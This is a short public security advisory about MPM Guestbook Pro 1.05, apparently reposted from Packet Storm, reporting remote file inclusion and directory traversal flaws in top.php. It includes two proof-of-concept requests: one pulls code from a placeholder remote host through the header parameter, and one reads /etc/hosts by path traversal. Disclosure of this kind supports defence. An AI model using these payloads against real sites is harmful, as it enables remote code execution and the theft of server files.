MPM Guestbook Pro 1.05 is susceptible to file inclusion and directory traversal attacks.
bd873c882571bb58ef6d64418f8f55cbf92793860c9f7d62816db4ac2fa81055__ ___/____ __________ /____________ _____ ___/______________ _____________
_____ \__ / / /_ ___/ __/ _ \_ __ `__ \____ \_ _ \ ___/ / / /_ ___/ _ \
____/ /_ /_/ /_(__ )/ /_ / __/ / / / / /___/ // __/ /__ / /_/ /_ / / __/
/____/ _\__, / /____/ \__/ \___//_/ /_/ /_//____/ \___/\___/ \__,_/ /_/ \___/
/____/
____________________ _
_ __ \_ ___/_ __ `/
___/ /_/ / / _ /_/ /
_(_)____//_/ _\__, /
/____/
Ref: SS#11012005
SYSTEMSECURE.ORG - Advisory/Exploit
* PUBLIC ADVISORY *
Software:
MPM Guestbook Pro 1.05 (maybe all versions)
Link:
http://mpm.pahviloota.net/
Attacks:
Remote File Include and File Disclusore
Discovered by:
SmOk3 [smok3f00@gmail.com]
Vendor:
Warned about this vulnerability
-- ! Description !--
MPM Guestbook Pro is a famous php Guestbook system. This script allows malicious users to include
arbitrary script code from remote. This may expose sensitive information and compromise the entire
system. The problem is in the file "top.php", in the first lines:
<?php include($header); ?>
PoC: /gbpro/top.php?header=http://[CMD]
Also, you can view any file in the system, due to file disclure on the same variable.
PoC: /gbpro/top.php?header=../../../../../../../etc/hosts
-- ! Solution !--
No patch available yet.
<base64>Rm9y52EgUG9ydHVnYWw=</base64>
-EOF-
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed